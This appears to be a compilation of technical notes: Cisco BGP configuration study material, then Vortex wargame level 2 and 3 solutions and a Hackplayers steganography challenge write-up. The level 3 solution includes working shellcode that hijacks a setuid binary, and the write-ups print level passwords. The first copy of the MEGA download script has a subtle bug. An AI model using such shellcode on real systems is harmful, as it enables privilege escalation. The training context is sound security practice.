# BGP Routing Policies


Route Filtering and Route Summarization

Tools used to filter BGP routes:

- Distribution lists
- Prefix lists
- AS_PATH filter lists
- Route maps
- aggregate-address command

The first four have the following in common:

- Can filter incoming or outgoing updates, per neighbor or per peer group.
- Examine the contents of the BGP update message (PAs and NLRI).
- If a filter is changed, a clear command is required. The clear command can use the soft reconfiguration.

The tools differ in what they can match in the BGP update message:

- neighbor distribute-list _standard-acl_: Prefix with wc (wilcard) mask.
- neighbor distribute-list _extended-acl_: Prefix and prefix length with wc mask.
- neighbor prefix-list: Exact or "first N" bits of prefix plus range of prefix lengths.
- neighbor filter-list: All NLRI whose AS_PATHs are matched.
- neighbor route-map: Prefix, prefix length, AS_PATH and/or any other PA matchable within a BGP route map.

Filtering BGP updates based on NLRI

ip access-list extended lose-2
 deny ip host 22.2.2.0 host 255.255.255.0
 deny ip host 23.3.16.0 host 255.255.240.0
 permit ip any any
route-map rmap-lose-2 permit 10
 match ip address lose-2
router bgp 123
 neighbor 1.1.1.1 route-map rmap-lose-2 out
 neighbor 2.2.2.2 distribute-list lose-2 out
...
ip prefix-list prefix-lose-2 seq 5 deny 22.2.2.0/24
ip prefix-list prefix-lose-2 seq 10 deny 23.3.16.0/20
ip prefix-list prefix-lose-2 seq 15 permit 0.0.0.0/0 le 32
router bgp 123
 neighbor 9.9.9.9 prefix-list prefix-lose-2 out
! clear ip bgp 9.9.9.9 out or clear ip bgp * soft
Soft Reconfiguration

clear ip bgp {* | _neighbor-address_ | _peer-group-name_} [soft [in | out ]]

IOS supports soft reconfiguration for sent updates but needs configuration for inbound updates.
neighbor _neighbor-id_ soft-reconfiguration inboud command causes the router to keep a copy of the received updates.
BGP can simply reapply the changed filtering policy to the update without closing the neighbor connection.

Comparing BGP Prefix Lists, Distribute Lists and Route Maps

Distribute Lists for simple prefix matching (ACLs).
Prefix Lists for more flexible prefix matching.
The neighbor filter-list for AS_PATH filtering.
Route maps can be used for the same tasks, however, only route maps can provide the following two functions:

- Combine multiple logic: prefix/length, AS_PATH or other PAs
- Manipulate BGP PAs

Filtering Subnets of a Summary Using the aggregate-address Command

The filtering options on the aggregate-address command are:

- Filtering all component subnets by using the summary-only keyword.
- Advertising all component subnets by omitting the summary-only keyword.
- Advertising partial component subnets by referring a route map using the suppress-map keyword.
ip access-list extended permit-1
 permit ip host 23.3.16.0 host 255.255.240.0
route-map suppress-1 permit 10
 match ip address permit-1
router bgp 123
 aggregate-address 23.0.0.0 255.0.0.0 as-set suppress-map suppress-1
Filtering BGP Updates by Matching the AS_PATH PA

ip as-path access-list _number_ {permit | deny} _regex_
neighbor _neighbor-id_ filter-list _as-path-filter-number_ {in | out}

NLRI whose AS_PATHs match with a deny action are filtered.

The BGP AS_PATH and AS_PATH Segment Types

The AS_PATH segment types:

- AS_SEQ: Ordered list of ASNs, separated using spaces and non-enclosed.
- AS_SET: Unordered list of ASNs, separated using commas and enclosed using braces.
- AS_CONFED_SEQ: Ordered list of confederation ASNs, separated using spaces and enclosed using parentheses.
- AS_CONFED_SET: Unordened list of confederation ASNs, separated using commas and enclosed using braces.

Using Regular Expressions to Match AS_PATH

The logic:

- Line by line search for a mathed AS_PATH regex.
- A permit action does not filter the NRLI.
- A deny action filters the NRLI.
- Any NLRI not matched is filtered.

Regex metacharacters:

^ Start of line.
$ End of line.
| Logical OR applied between the preceding and succeeding characters
_ Any delimiter: blank, comma, start of line or end of line.
. Any single character.
? Zero or one instance of the preceding character.
* Zero or more instances of the preceding character.
+ One or more instances of the preceding character.
(string) Parentheses combine enclosed string as a single entity when used with ?,* or +.
[string] Wildcard for which any of the single characters in the string can be used to match that position.

Example: Matching AS_PATHs Using AS_PATH Filters

- show ip bgp neighbor _neighbor-id_ advertised-routes displays the routes sent.
- show ip bgp neighbor _neighbor-id_ received-routes displays the routes received from a neighbor.
- Output filter lists are applied before the routers adds its own ASN to the AS_PATH.
- show ip bgp regexp _expression_ tests the regex. The regexp option is not allowed with received-routes or advertised-routes.
- AS_PATH filter list can also be referenced in a route map using match as-path _list-number_.

The BGP Decision Process

0. Is the NEXT_HOP reachable?
1. Highest administrative weight: Local and Cisco-propietary feature.
2. Highest LOCAL_PREF PA: Well-known discretionary PA. Distributed inside the AS only. Used to choose the same exit point for particular NLRI.
3. Locally injected routes.
4. Shortest AS_PATH length: Treats an AS_SET as one ASN and counts each ASN in the AS_SEQ as one. Ignored if bgp bestpath as-path ignore command is configured.
5. ORIGIN PA: (i) routes are preferred over (e) routes, which are preferred over (?) routes.
6. Smallest Multi-Exit Discriminator (MED) PA: Tells a neighbor which of the peer connections is best for reaching particular NLRI.
7. Neighbor type: Prefer eBGP routes over iBGP.
8. IGP metric for reaching the NEXT_HOP: The lower the value, the better the route.

N
WLLA
OMNI

Three Final Tiebreaker Steps in the BGP Decision Process

9. Keep oldest eBGP route: This action reduces eBGP route flaps.
10. Choose smallest neighbor RID: Use the route whose next-hop router RID is the smallest. Needs the bgp bestpath compare-routerid command.
11. Smallest neighbor ID: Prefer the route advertised by the lowest neighbor ID.

Adding Multiple BGP Routes to the IP Routing Table

- If the best path for an NLRI is determined in steps 0 through 8, BGP adds only one route to the IP routing table.
- If the best path is determined after step 8, BGP considers placing multiple BGP routes into the IP routing table.
- Even if multiple BGP routes are added to the IP routing table, BGP still chooses only one route that will advertise to neighbors.

Step 0: NEXT_HOP Reachable

The router accepts a BGP route as best only if can forward packets to the next-hop router.
The NEXT_HOP can be changed using neighbor _neighbor-id_ next-hop-self or neighbor _neighbor-id_ next-hop-unchanged.

Step 1: Administrative Weight

Two methods of configuring the weight:

neighbor _neighbor-id_ weight _weight_
neighbor _neighbor-id_ route-map _route-map_ [in | out]
set weight _weight_

Step 2: Highest Local Preference (LOCAL_PREF)

The default value is 100.
neighbor _neighbor-id_ route-map _route-map_ [in | out]
set local-preference _number_

Step 3: Choose Between Locally Injected Routes Based on ORIGIN PA

When the same NLRI is locally injected into BGP from multiple methods, pick the route with the better ORIGIN PA.

Step 4: Shortest AS_PATH

The typical logic requires a router to calculate the number of ASNs int the AS_SEQ and add 1 if an AS_SET exists.
AS_CONFED_SEQ and AS_CONFED_SET do no count at all in the calculation.
aggregate-address _network_ _mask_ [as-set]:
- If the component subnets have different AS_PATH, the summary route has only the local AS in the AS_SEQ.
- Otherwise, the summary route contains the AS_SEQ from the component subnets and the local AS prepended.
neighbor remove-private-as:
- Private ASNs can be removed only at the point of sending an eBGP update.
- If the current AS_SEQ contains both private and public ASNs, the private ASNs will not be removed.
neighbor local-as [no-prepend]:
- Allows a router to use a different AS.
- no-prepend, the router does not prepend any ASN.
Using a neighbor route-map, the route map can use the set as-path prepend to prepend one or more ASNs into the AS_SEQ.
The bgp bestpath as-path ignore _command_ removes the AS_PATH length step from the decision tree.

Step 5: Best ORIGIN PA

BGP routing policies may set the ORIGIN code explicity by using the set origin route map subcommand.

Step 6: Smallest Multi-Exit Discriminator

Allows an AS to tell a neighboring AS the best way to forward packets into the first AS.
Default value is 0. A better default for MED can be set by using the bgp bestpath med missing-as-worst subcommand.
Configured via neighbor route-map _route-map_ out, using set metric subcommand.
To consider the MED in all cases, even when the AS_PATH differs, use the bgp always-compare-med subcommand.
To enhance te MED logic, use the bgp deterministic-med command.

Step 7: Prefer Neighbor Type eBGP over iBGP

BGP uses this decision point when two or more enterprise routers connect to the same ISP.
Each enterprise router knows of one eBGP route to reach each prefix and one or more iBGP routes to the same prefix.

Step 8: Smallest IGP Metric to the NEXT_HOP

The router looks for the BGP route with the smallest IGP metric to reach the NEXT_HOP IP address.

Step 9: Lowest BGP router ID of Advertising Router

Pick the route with the lowest RID:

- Examine eBGP routes first and after, the iBGP routes.
- If the existing best route is an eBGP route, do no replace the existing one, even if the new route has a smaller RID. This behavior can be changed by configuring bgp bestpath compare-routerid command.
- If the existing best route is an iBGP route, the decision is based on the lowest RID.

Step 10: Lowest Neighbor ID

If step 9 does not break the tie, then the router has at least two neighbor commands that point to the same router.
The router picks the routes with the lowest neighbor IP address.

The BGP maximum-paths Command

BGP defaults the maximum-paths to 1.
However, BGP will consider adding multiple entries to the IP routing table under certain conditions.
For eBGP routes:

1. BGP reaches step 9 or 10 to determine the best route.
2. The maximum-paths _number_ is configured to something larger than 1.
3. Only eBGP routes whose adjacent ASNs are the same as the best route are considered as candidates.
4. If there are more candidates than the allowed ones, the tiebreakers of step 9 and 10 determine which ones to use.

For iBGP routes:

1. Same rule as eBGP rule 1.
2. The maximum-paths ibgp _number_ is configured to something larger than 1.
3. Only iBGP routes with differing NEXT_HOP are considered as candidates.
4. Same rule as eBGP rule 4.

The maximum-paths eibgp _number_ applies to both iBGP and eBGP routes, but only when MPLs is in use.

BGP communities

They allow routers in one AS to communicate policy information to routers that are one or more AS distant (optional transitive).
router bgp 4
 neighbor 10.1.34.3 send-community both
 neighbor 10.1.34.3 route-map comm out
ip prefix-list 11 seq 5 permit 11.0.0.0/8
ip prefix-list 21 seq 5 permit 21.0.0.0/8
route-map comm permit 10
 match ip address prefix-list 11
 set community 1
route-map comm permit 20
 match ip address prefix-list 21
 set community 2
route-map comm permit 30
!
router bgp 123
 neighbor 10.1.34.4 route-map react-to-comm in
ip community-list 1 permit 1
ip community-list 2 permit 2
route-map react-to-comm permit 10
 match community 1
 set local-preference 300
route-map react-to-comm permit 20
 match community 2
 set local-preference 200
route-map react-to-comm permit 30
Matching COMMUNITY with Community Lists

The COMMUNITY PA has two representations of 32 bits:

- Original Cisco format: decimal value (32 bits). Default format.
- New RFC format: AA:NN (16 bits:16 bits). ip bgp-community new-format.

set community 10 20 30 creates a COMMUNITY with all three values and replaces any existing COMMUNITY.
set community 10 20 30 additive adds the values to the existing COMMUNITY string.

Standard community list uses numbers between 1 and 99, can math multiple communities in a single command but does not support regexp.
Extended community list uses numbers between 100 and 199, can match multiple communities in a single command and supports regexp.

Removing COMMUNITY Values

Removing the entire COMMUNITY is relatively simple using the set community none command in a route-map.
To remove individual COMMUNITY strings use the set comm-list _number_ delete command.

Filtering NLRI Using Special COMMUNITY Values

match community {_standard_ | _extended_ | _name_ [exact]}
BGP includes reserved values for the COMMUNITY PA that allow route filtering but with less effort than is required with community lists and route maps:

- NO_EXPORT (value FFFF:FF01): Do not advertise outside this AS.
- NO_ADVERT (value FFFF:FF02): Do not advertise to any other peer.
- LOCAL_AS or NO_EXPORT_SUBCONFED (value FFFF:FF03): Do not advertise outside the local confederation sub-AS.

# Fundamentals of BGP Operations


BGP Neighbor Summary

- TCP port: 179
- bgp timers _keepalive_ _holdtime_ and neighbor _ip-address_ timers _keepalive_ _holdtime_. Default to 60 and 180 seconds.
- Internal BGP neighbor: Neighbor is in the same AS.
- External BGP neighbor: Neighbor is in another AS.
- How is the BGP router ID (RID) determined? bgp router-id command, highest IP of an up/up loopback at start time of the BGP process, highest IP of another up/up interface at start time of the BGP process.
- How is the source IP selected to reach a neighbor? neighbor update-source, otherwise, uses the outgoing interface IP address.
- How is the destination IP selected to reach a neighbor? neighbor command.
- Auto-summary: Disabled by default.
- Neighbor authentication: MD5 only, using the neighbor _ip-address_ password _string_ command.

Internal BGP Neighbors

router bgp 123
 no synchronization
 bgp log-neighbor-changes
 no auto-summary
 bgp router-id 111.111.111.111
 neighbor 2.2.2.2 remote-as 123
 neighbor 2.2.2.2 update-source Loopback1
 neighbor 3.3.3.3 remote-as 123
 neighbor 3.3.3.3 password secret-pw
 neighbor 3.3.3.3 update-source Loopback1
router bgp 123
 no synchronization
 bgp log-neighbor-changes
 no auto-summary
 neighbor my-as peer-group
 neighbor my-as remote-as 123
 neighbor my-as update-source Loopback1
 neighbor 1.1.1.1 peer-group my-as
 neighbor 1.1.1.1 password secret-pw
 neighbor 2.2.2.2 peer-group my-as
The neighbor peer-group command simplifies the configuration and reduces some BGP processing and memory overhead.

External BGP Neighbors

router bgp 123
 neighbor 172.16.16.6 remote-as 678
router bgp 123
 neighbor 4.4.4.4 remote-as 45
 neighbor 4.4.4.4 update-source loopback1
 neighbor 4.4.4.4 ebgp-multihop 2
Checks Before Becoming BGP Neighbors

1. The router must receive a TCP connection with a source address configured in a neighbor command.
2. The router ASN must match de configured remote ASN (Not true for confederation configurations).
3. The BGP RIDs must not be the same.
4. If configured, MD5 authentication must pass.

BGP Open messages include BGP timers. If they do not match, each router uses the lower of the values.

BGP Messages and Neighbor States

- Idle.
- Connect: Listen for TCP.
- Active: Listen for TCP, Initiate TCP.
- Open sent: Listen for TCP, Initiate TCP, TCP up, Open sent.
- Open confirm: Listen for TCP, Initiate TCP, TCP up, Open sent, Open received.
- Established: Listen for TCP, Initiate TCP, TCP up, Open sent, Open received, Neighbor up.

BGP Message Types

- Open: to establish a neighbor relationship and exchange basic parameters.
- Keepalive: to maitain the neighbor relationship.
- Update: to exchange routing information.
- Notification: to reset a neighbor relationship (used when BGP errors occur).

Purposefully Resetting BGP Peer Connections

neighbor _ip-address_ shutdown and clear ip bgp _ip-address_ commands close the TCP connection to that neighbor, and removes all entries from the BGP table learned from that neighbor.

BGP network Command

The BGP network router subcommand instructs that router to look for a route in the router's IP routing table and if exists, put the equivalent NLRI (Network Layer Reachability Information) into the local BGP table.
With this logic, connected routes, static routes, or IGP routes could be taken from the IP routing table and placed into the BGP table for later advertisement. When the router removes that route from its IP routing table, BGP then removes the NLRI from the BGP table and notifies its neighbors.
Key features:

- No mask is configured: Assumes the default classful mask.
- No auto-summary configured: An IP route must match both the prefix and the prefix length.
- Auto-summary configured: A classful network matches if any subnets exist.
- NEXT_HOP path attribute: Uses next hop of IP route.
- Maximum number injected by the network command into one BGP process: Limited by NVRAM and RAM.
- Purpose of the route-map option on the network command: To filter routes and manipulate path attributes.

A NEXT_HOP path attribute equal to 0.0.0.0 in the BGP table implies a connected route or null0 route in the IP routing table.

Redistributing from an IGP, Static, or Connected Route

router bgp 678
 redistribute static metric 9
 redistribute eigrp 6 route-map just-30-something
Impact of Auto-Summary on Redistributed Routes and the network Command

The logic is summarized as follows:

- redistribute: if any subnets of a classful network would be redistributed, do not redistribute, but instead redistribute a route for the classfull network.
- network: if a network command list a classful network number, with the classfull default mask or no mask, and any subnets of the classful network exist, inject a route for the classful network.

Manual Summaries and the AS_PATH Path Attribute

BGP manual summarization with the aggregate-address command differs from using the auto-summary command.
It can summarize based on any routes in the BGP table, creating a summary of any prefix length. It does not always suppress the advertisement of the component subnets, although it can be configured to do so.
The AS_PATH PA consists of up to four different components, called segments:

- AS_SEQ
- AS_SET
- AS_CONFED_SEQ
- AS_CONFED_SET

The aggregate-address command can create a summary route for which the AS_SEQ must be null when the component subnets of the summary route have differing AS_SEQ values.
The AS_SET segment solves the problem when the summary route has a null AS_SEQ. It holds an unordered list of all the ASNs.
The router suppresses the advertisement of all component subnets if the summary-only keyword is used, advertises all of them if the summary-only keyword is omitted, or advertises a subset if the suppress-map option is configured.

Router(config-router)# aggregate-address 23.0.0.0 255.0.0.0 summary-only as-set
Adding Default Routes to BGP

- Using the network 0.0.0.0 bgp subcommand. A route to 0.0.0.0/0 must exist in the local routing table via any means.
- Using the redistribute command and the default-information originate bgp subcommand.
- Using the neighbor _neighbor-id_ default-originate route-map _route-map-name_ bgp subcommand. Does not add a default route to the local bgp table. It causes de advertisement of a default to the specified neighbor. With the route-map option, the referenced route map examines the existence of a default route in the IP routing table.

ORIGIN Path Attribute

There are three BGP ORIGIN PA codes: IGP (i), EGP (e), Incomplete (?).
Routes redistributed into BGP use ORIGIN code ?.
Routes originated by EGP (Exterior Gateway Protocol), deprecated predecessor to BGP, use ORIGIN code e.
Routes created with the aggregate-address and:

- The as-set option is not used, use ORIGIN code i.
- The as-set option is used, and all component subnets use ORIGIN code i, use ORIGIN code i.
- The as-set option is used, and at least one subnet uses ORIGIN code ?, use ORIGIN code ?.

BGP Update Message

Each Update message has three main parts:

- The withdrawn routes field to inform its neighbors about failed routes.
- The PA field lists the PA for each route.
- The prefix and prefix lenght fields define each individual NLRI.

All the prefixes listed in a single update message share the same set of PA values.

Determining the Contents of Updates

BGP only advertises a route to reach a particular subnet (NLRI) if that route is considered to be the best route and if is not matched by a deny clause in an outbound BGP filter:

- Choose the route with the shortest AS_PATH.
- Prefer an eBGP-learned route over one iBGP route.
- Prefer the route with the lowest IGP metric to the NEXT_HOP. The NEXT_HOP has to be:
- 0.0.0.0 (route injected on the local router), or
- Reachable according the IP routing table.
- Choose the iBGP-learned route with the lowest BGP RID of the advertising router.

When sending to an eBGP peer, the NEXT_HOP is changed to the same IP address used as the source IP address of the BGP Update message.
Can be changed via the command neighbor ... next-hop-unchanged
When sending to an iBGP peer, the default action is to leave the NEXT_HOP PA unchanged.
Can be changed via the command neighbor ... next-hop-self

Another important rule consists in do not advertise paths learned from iBGP neighbors to other iBGP neighbors.

Adding eBGP Routes to the IP Routing Table

The two requirements are:

- The eBGP route in the BGP table is the best route.
- The AD for eBGP routes must be lower than de ADs for other routing sources (IGP or via static routes).

The AD for eBGP routes is 20, for iBGP routes is 200 and for local (locally injected) routes is 200.
These values can be overriden by using:

- distance bgp _external-distance_ _internal-distance_ _local-distance_ BGP subcommand, or
- distance _distance_ _ip-address_ _wildcard_ _access-list_ BGP subcommand (change AD for routes received by neighbor)

Backdoor Routes

Using network _network_ backdoor BGP subcommand, routers use the local AD (200) for that network and do not advertise it with BGP.

Adding iBGP Routes to the IP Routing Table

The same two eBGP requirements plus the concept of BGP synchronization.
With no synchronization, BGP uses the same logic for iBGP routes as it does for eBGP routes.
With synchronization, BGP does not consider an iBGP route as best unless the exact prefix was learned via IGP and is currently in the routing table.

Using Sync and Redistributing Routes

Redistribution solves the routing black-hole problem and sync solves the problem of advertising a black-hole route to another AS.
Sync does not work if OSPF RID and BGP RID do not match.

Disabling Sync and Using BGP on All Routers in an AS

A second method is to simply use BGP to advertise all BGP-learned prefiexes to all routers in the AS.
The downside is the addition of iBGP neighbor connections between each pair of routers (performance and convergence time).
BGP needs the full mesh of iBGP peers because it does not advirtise iBGP-learned routes to another iBGP peer.
BGP offers two alternatives: confederations and route reflectors.

Confederations

- Inside a sub-AS, full mesh is required.
- The confederation eBGP connections act like normal eBGP connections in that iBGP routes are advertised.
- The confederation eBGP connections act like normal eBGP connections regarding TTL (1 by default).
- The confederation eBGP connections act like iBGP connections in every other regard (NEXT_HOP is not changed by default).
- Confederation ASNs are not considered part of the length of the AS_PATH when a router chooses the best routes.
- Confederation routers remove the confederation ASNs from the AS_PATH in updates sent outside the AS.
- Confederation routers use the AS_CONFED_SEQ and AS_CONFED_SET segments of the AS_PATH PA.

Configuring Confederations

router bgp 65001
 no synchronization
 bgp router-id 111.111.111.111
 bgp confederation identifier 123
 bgp confederation peers 65023
 neighbor 2.2.2.2 remote-as 65023
 neighbor 2.2.2.2 ebgp-multihop 2
 neighbor 2.2.2.2 update-source loopback1
 neighbor 2.2.2.2 next-hop-self
 neighbor 172.16.16.6 remote-as 678
router bgp 65023
 no synchronization
 bgp confederation identifier 123
 bgp confederation peers 65001
 neighbor 1.1.1.1 remote-as 65001
 neighbor 1.1.1.1 ebgp-multihop 2
 neighbor 1.1.1.1 update-source loopback1
 neighbor 3.3.3.3 remote-as 65023
 neighbor 3.3.3.3 ebgp-multihop 2
 neighbor 3.3.3.3 update-source loopback1
router bgp 65023
 no synchronization
 bgp log-neighbor-changes
 bgp confederation identifier 123
 neighbor 2.2.2.2 remote-as 65023
 neighbor 2.2.2.2 ebgp-multihop 2
 neighbor 2.2.2.2 update-source loopback1
 neighbor 2.2.2.2 next-hop-self
 neighbor 4.4.4.4 remote-as 45
 neighbor 4.4.4.4 ebgp-multihop 2
 neighbor 4.4.4.4 update-source loopback1
Route Reflectors

Some routers are configured as RR servers, some as clients an some others as non-clients (normal iBGP or eBGP neighbor).
A RR cluster contains one or more RR servers and one or more clients.
Clients only peer with the RR servers in a cluster.
RR servers peer with clients and non-clients.

To prevent loops, the RR feature uses:

- CLUSTER_LIST: RR servers add ther cluster ID into the CLUSTER_LIST PA before sending an update. When receiving an update, RR servers discard received prefixes for which they cluster ID already appears.
- ORIGINATOR_ID: This PA lists the RID of the first iBGP peer to advertise the route into the AS. If a router sees its own RID into the ORGINATOR_ID, it does not use or propagate the route.
- Only advertise the best routes: RR servers reflect routes only if the routes are the best ones in its own BGP table.

router bgp 123
 no synchronization
 neighbor 2.2.2.2 remote-as 123
 neighbor 2.2.2.2 update-source loopback1
 neighbor 2.2.2.2 next-hop-self
 neighbor 4.4.4.4 remote-as 45
 neighbor 4.4.4.4 ebgp-multihop 255
 neighbor 4.4.4.4 update-source loopback1
router bgp 123
 no synchronization
 bgp cluster-id 1 ! 0.0.0.1
 neighbor 3.3.3.3 remote-as 123
 neighbor 3.3.3.3 update-source loopback1
 neighbor 3.3.3.3 route-reflector-client
 neighbor 9.9.9.9 remote-as 123
 neighbor 9.9.9.9 update-source loopback1
router bgp 123
 no synchronization
 bgp router-id 9.9.9.9
 bgp cluster-id 2 ! 0.0.0.2
 neighbor 1.1.1.1 remote-as 123
 neighbor 1.1.1.1 update-source loopback1
 neighbor 1.1.1.1 route-reflector-client
 neighbor 2.2.2.2 remote-as 123
 neighbor 2.2.2.2 update-source loopback1
Summary: BGP PAs

- AS_PATH: List ASNs through which the route has been advertised. Well known and mandatory.
- NEXT_HOP: List the nex-hop IP to reach an NLRI. Well known and mandatory.
- AGGREGATOR: Lists the RID and ASN of the router that created a summary NLRI. Optional and transitive.
- ATOMIC_AGGREGATE: Tags a summary NLRI as being a summary. Well known and discretionary
- ORIGIN: Value from where the route was injected into BGP: i, e or ?. Well known and mandatory.
- ORIGINATOR_ID: Used by RR servers to know the RID of the iBGP neighbor that injected the NRLI into the AS. Optional and transitive.
- CLUSTER_LIST: Used by RR servers to list the cluster IDs in order to prevent loops. Optional and nontransitive.

- Well known: the PA must be supported by any BGP implementation.
- Mandatory: the PA must appear in every BGP update.
- Discretionary: the PA may or may not appear in a BGP update.
- Optional: the PA may or may not be supported in all BGP implementation.
- Transitive: If the PA is received but not recognized, it should be passed on to the next AS.
- Nontransitive: If the PA is received but not recognized, it is not required to pass it on.

Summary: Methods to introduce entries into the BGP table

- network command: Advertises a route into BGP. Depends on the existence of the network int the routing table.
- Redistribution: Takes IGP, static or connected routes.
- Manual summarization: Requires at least one component subnet in the BGP table.
- default-information originate: Requires a default route in the routing table plus the redistribute command.
- neighbor default-originate: An optional route map filters the default route advertisement.

# Vortex wargame: Level 3


# ssh vortex3@vortex.labs.overthewire.org
vortex3@vortex.labs.overthewire.org's password:36346e635854767823

$ file /vortex/vortex3
/vortex/vortex3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xfa95ff349b30e694b0106281d5c79e2b1ab997c2, not stripped
$ objdump --section=.plt --disassemble-all /vortex/vortex3 | grep -A 3 exit
08048320 <exit@plt>:
 8048320:       ff 25 38 97 04 08       jmp    *0x8049738
 8048326:       68 10 00 00 00          push   $0x10
 804832b:       e9 c0 ff ff ff          jmp    80482f0 <_init+0x3c>
$ readelf --sections /vortex/vortex3 | grep "\["
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048168 000168 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0804818c 00018c 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481ac 0001ac 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804820c 00020c 000051 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804825e 00025e 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0804826c 00026c 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             0804828c 00028c 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048294 000294 000020 08   A  5  12  4
  [11] .init             PROGBITS        080482b4 0002b4 00002e 00  AX  0   0  4
  [12] .plt              PROGBITS        080482f0 0002f0 000050 04  AX  0   0 16
  [13] .text             PROGBITS        08048340 000340 0001ec 00  AX  0   0 16
  [14] .fini             PROGBITS        0804852c 00052c 00001a 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048548 000548 000008 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        08048550 000550 000034 00   A  0   0  4
  [17] .eh_frame         PROGBITS        08048584 000584 0000c0 00   A  0   0  4
  [18] .ctors            PROGBITS        08049644 000644 000008 00  WA  0   0  4
  [19] .dtors            PROGBITS        0804964c 00064c 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        08049654 000654 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049658 000658 0000c8 08  WA  6   0  4
  [22] .got              PROGBITS        08049720 000720 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        08049724 000724 00001c 04  WA  0   0  4
  [24] .data             PROGBITS        08049740 000740 000010 00  WA  0   0  4
  [25] .bss              NOBITS          08049750 000750 000008 00  WA  0   0  4
  [26] .comment          PROGBITS        00000000 000750 00002a 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 00077a 0000fc 00      0   0  1
  [28] .symtab           SYMTAB          00000000 000d28 000440 10     29  45  4
  [29] .strtab           STRTAB          00000000 001168 000216 00      0   0  1
$ gdb -q /vortex/vortex3
(gdb) break main
(gdb) run
(gdb) find 0x08048134,0x08049750,0x8049738
0x80482a4
0x8048322 
0x80492a4
0x8049322
(gdb) quit
$ /vortex/vortex3 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x106 . "\x22\x93\x04\x08"'`
$ /usr/bin/whoami
vortex4
$ /bin/cat /etc/vortex_pass/vortex4
32596d674b313d6a77

# Vortex wargame: Level 2


# ssh vortex2@vortex.labs.overthewire.org
vortex2@vortex.labs.overthewire.org's password:3233616e62545c7245

$ file /vortex/vortex2
/vortex/vortex2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xa2068f9ce871bdff032adefe1a15d401744c3520, not stripped
$ vortex/vortex2 /etc/vortex_pass/vortex3
/bin/tar: Removing leading `/' from member names
$ cat /tmp/ownership.\$$.tar
etc/vortex_pass/vortex30000400001161300116130000000001212164101775015332 0ustar  vortex3vortex336346e635854767823

# Reto 17: Toulouse


# mkdir reto17
# cd reto17
reto17# hp=http://www.hackplayers.com/2013/05/reto-17-toulouse.html
reto17# url=`curl --silent $hp | grep mega | awk -F '"' '{print $6}'`
reto17# cat mega-dl
#!/bin/bash

url=$1
enc_file=$2.enc
out_file=$2

 id=`echo $url | awk -F '!' '{print $2}'`
key=`echo $url | awk -F '!' '{print $3}' | sed -e 's/-/+/g' -e 's/_/\//g' -e 's/,//g'`
b64_hex_key=`echo -n $key | base64 --decode --ignore-garbage > /dev/null | xxd -p | tr -d '\n'`
key[0]=$(( 0x${b64_hex_key:00:16} ^ 0x${b64_hex_key:32:16} ))
key[1]=$(( 0x${b64_hex_key:16:16} ^ 0x${b64_hex_key:48:16} ))
key=`printf "%x" ${key[*]}`
iv="${b64_hex_key:32:16}0000000000000000"
new_url=`curl --silent --request POST --data-binary '[{"a":"g","g":1,"p":"'$id'"}]' https://eu.api.mega.co.nz/cs | awk -F '"' '{print $10}'`
curl --output $enc_file $new_url
openssl enc -d -aes-128-ctr -K $key -iv $iv -in $enc_file -out $out_file
rm -f $enc_file
reto17# ./mega-dl $url stego.mp4
reto17# tc=truecrypt-7.1a-linux-console-x64.tar.gz
reto17# curl --output $tc http://www.truecrypt.org/download/$tc
reto17# tar xvzf $tc
reto17# ./truecrypt-7.1a-setup-console-x64
reto17# mkdir volume
reto17# truecrypt --non-interactive --password=TOULOUSE stego.mp4 volume
reto17# head volume/CABLE_245612.txt
UNCLAS SECTION 01 OF 04 MADRID 000086

SENSITIVE
SIPDIS

STATE FOR EUR/WE, EEB/TPP/IPE, EEB/IFD/OIA, EEB/TRA/AN
STATE PASS USTR FOR D.WEINER
COMMERCE FOR 4212/DON CALVERT
ENERGY FOR PIA/K.BALLOU AND EERE/D.BIRNS
TREASURY FOR OIA/OEE/R.JOHNSTON AND OTP/M.CORWIN
References

http://keyj.emphy.de/real-steganography-with-truecrypt/
http://www.steganosaur.us/lecture

# Download MEGA files from command-line


# cat mega-dl
#!/bin/bash

url=$1
enc_file=$2.enc
out_file=$2

 id=`echo $url | awk -F '!' '{print $2}'`
key=`echo $url | awk -F '!' '{print $3}' | sed -e 's/-/+/g' -e 's/_/\//g' -e 's/,//g'`
b64_hex_key=`echo -n $key | base64 --decode --ignore-garbage 2> /dev/null | xxd -p | tr -d '\n'`
key[0]=$(( 0x${b64_hex_key:00:16} ^ 0x${b64_hex_key:32:16} ))
key[1]=$(( 0x${b64_hex_key:16:16} ^ 0x${b64_hex_key:48:16} ))
key=`printf "%x" ${key[*]}`
iv="${b64_hex_key:32:16}0000000000000000"
new_url=`curl --silent --request POST --data-binary '[{"a":"g","g":1,"p":"'$id'"}]' https://eu.api.mega.co.nz/cs | awk -F '"' '{print $10}'`
curl --output $enc_file $new_url
openssl enc -d -aes-128-ctr -K $key -iv $iv -in $enc_file -out $out_file
rm -f $enc_file
# url='https://mega.co.nz/#!HFsiWYrJ!VkovRDl9kJkIMDBkiRlw-E9OGOkcD1DbNqs3d-CGNf8'
# ./mega-dl $url toulouse.mp4
# file toulouse.mp4
